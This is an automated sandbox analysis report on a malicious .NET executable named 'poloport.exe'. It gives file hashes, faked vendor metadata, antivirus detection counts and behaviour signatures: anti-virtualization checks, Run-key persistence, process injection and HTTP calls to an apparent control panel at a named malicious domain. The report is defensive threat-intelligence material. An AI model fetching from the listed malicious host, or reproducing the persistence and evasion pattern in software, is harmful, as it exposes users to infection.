File details | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 440.00 KB (450560 bytes) |
Compile time: | 2018-01-04 09:03:40 |
MD5: | cefd943367d9ebe51f30c18053812003 |
SHA1: | 79a7f9f8a27201a7a9c154ec8a939a5e78bd3405 |
SHA256: | 87feade22c18a0fc5ba3776af53704aa0c7bd2401151b05a76dc3fb99c8411ff |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2018-02-08 22:30:08 |
Last submission: | 2018-02-08 22:30:08 |
Filename detected: |
- poloport.exe (1) |
URL file hosting |
---|
hXXp://yt.wozyzy.com/poloport.exe |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-02-08 18:50:01 | [46/67] | | |
PE Sections 3 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x3d364 | 250880 | 65dc7f8145d9e9c81811b1037ebdc3d4 | be4ff8e9e663b7add67b5cbf87c1925381383680 |
.rsrc | 0x40000 | 0x306a4 | 198656 | 19645de95e2abfd36e6a68b9a79f968c | c96d97447bdf940fdae4624a34fc28c5c528fa44 |
.reloc | 0x72000 | 0xc | 512 | 950185ba2c133b1d1a5096dddfb7172c | 396950309fbda5213b298e873f4e7c96deb052e6 |
PE Resources | |||||
---|---|---|---|---|---|
Name | Offset | Size | Language | Sublanguage | Data |
RT_BITMAP | 0x401f0 | 180374 | LANG_ENGLISH | SUBLANG_ENGLISH_US | |
RT_ICON | 0x6f8d8 | 1128 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_GROUP_ICON | 0x6fd40 | 48 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_VERSION | 0x6fd70 | 1080 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_MANIFEST | 0x70394 | 784 | LANG_ENGLISH | SUBLANG_ENGLISH_US |
- API Alert
- Anti Debug
Meta Info | |
---|---|
LegalCopyright: | (c) Computer Associates International |
Assembly Version: | 11.19.16.19 |
InternalName: | poloport.exe |
FileVersion: | 2.9.4.1 |
CompanyName: | Computer Associates International Company |
Comments: | Computer Associates International Arto |
ProductName: | Computer Associates International Checker Arto |
ProductVersion: | 2.9.4.1 |
FileDescription: | Computer Associates International |
Translation: | 0x0000 0x04b0 |
OriginalFilename: | poloport.exe |
XOR | |
---|---|
No XOR information found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
File type: Library | |
mscoree.dll |
IP Found | |
---|---|
2.9.4.1 | |
11.19.16.19 |
URL(s) | |
---|---|
http://www.w3.org/2001/XMLSchema-instance |
String too long |
---|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> <?xml version="1.0" encoding="utf-8"?> <asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="requireAdministrator" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> </application> </compatibility> </asmv1:assembly> |
p%\/-
]PTA_
JW1g
L>dd
j{{}
Olr`|
>Ow^
'{=K0
(s{
F[ `
t}/q]
ExNl
x+%3`~s
!\q
0cmrrp'
r_7Gx
{ {l
l[1q
6[3?
B6CKm
p(\o
:7F[
YC*|o
(l
7j>B
di]xf
2Law
NewLateBinding
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-02-08 22:29:19 | 2018-02-08 22:32:13 | 174 |
14 Behaviors detected by system signatures
Collects information to fingerprint the system
Severity: High
Confidence: High
Checks the CPU name from registry, possibly for anti-virtualization
Severity: High
Confidence: Very High
Retrieves Windows ProductID, probably to fingerprint the sandbox
Severity: High
Confidence: Very High
Creates a hidden or system file
Severity: High
Confidence: Medium
- file: C:\Users\Seven01\AppData\Roaming\jit\jit.exe
Installs itself for autorun at Windows startup
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\jit
- data: C:\Users\Seven01\AppData\Roaming\jit\jit.exe
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: poloport.exe(2476) -> None(2692)
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.99, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0003d400, virtual_size: 0x0003d364
- section: name: .rsrc, entropy: 7.92, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00030800, virtual_size: 0x000306a4
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://checkip.dyndns.org/
- url: http://yt.wozyzy.com/WebPanel/api.php
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://checkip.dyndns.org/
- suspicious_request: http://yt.wozyzy.com/WebPanel/api.php
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
A process attempted to delay the analysis task.
Severity: Medium
Confidence: Very High
- Process: WmiPrvSE.exe tried to sleep 301 seconds, actually delayed analysis time by 0 seconds
Creates RWX memory
Severity: Medium
Confidence: Medium
9 Summary items with data
Files
Read Files
Write Files
C:\Users\Seven01\AppData\Roaming\jit\jit.exe \??\PIPE\samr C:\Windows\sysnative\wbem\repository\WRITABLE.TST C:\Windows\sysnative\wbem\repository\MAPPING1.MAP C:\Windows\sysnative\wbem\repository\MAPPING2.MAP C:\Windows\sysnative\wbem\repository\MAPPING3.MAP C:\Windows\sysnative\wbem\repository\OBJECTS.DATA C:\Windows\sysnative\wbem\repository\INDEX.BTR \??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER \??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM \??\WMIDataDevice \??\PIPE\wkssvc \??\PIPE\srvsvc
Delete Files
Nothing to display
Keys
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eMicInWave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eSpeakerTopo HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eSpeakerWave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ClassGUID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{C2D43895-0262-4873-A789-C2F96D24B693} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\Properties 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{684BB8B6-2793-49A5-8012-E0A941B4B4DF} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{5F6D61D9-D207-449A-BD48-652A5D1F25BE} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{29898C9D-B0A4-4FEF-BDB6-57A562022CEE} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{E43D242B-9EAB-4626-A952-46649FBB939A} 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#NDISWANBH HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#NDISWANIP HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#NDISWANIPV6 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{8E301A52-AFFA-4F49-B9CA-C79096A1A056} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{DF4A9D2C-8742-4EB1-8703-D395C4183F33} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{71F897D7-EB7C-4D8D-89DB-AC80D9DD2270} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{83da6326-97a6-4088-9453-a1923f573b29} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000006 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Pnp\{71d10298-bdb9-4dcd-a87a-eec6137ab254}\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{EEAB7790-C514-11D1-B42B-00805FC1270E}\ASYNCMAC HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ClassGUID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ContainerID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Legacy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361} 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\# HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CompatibleIDs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#\Control HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceHandlers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage\LastUpdateTime HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyCacheDate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage\SW#{eeab7790-c514-11d1-b42b-00805fc1270e} 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyHwIdKey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{afd97640-86a3-4210-b67c-289c41aabe55} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\SYSTEM\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\SYSTEM\0000\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\Control HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\BTH 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_AGILEVPNMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_L2TPMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_NDISWANBH\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_NDISWANIP\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_NDISWANIPV6\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPPOEMINIPORT\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Capabilities 
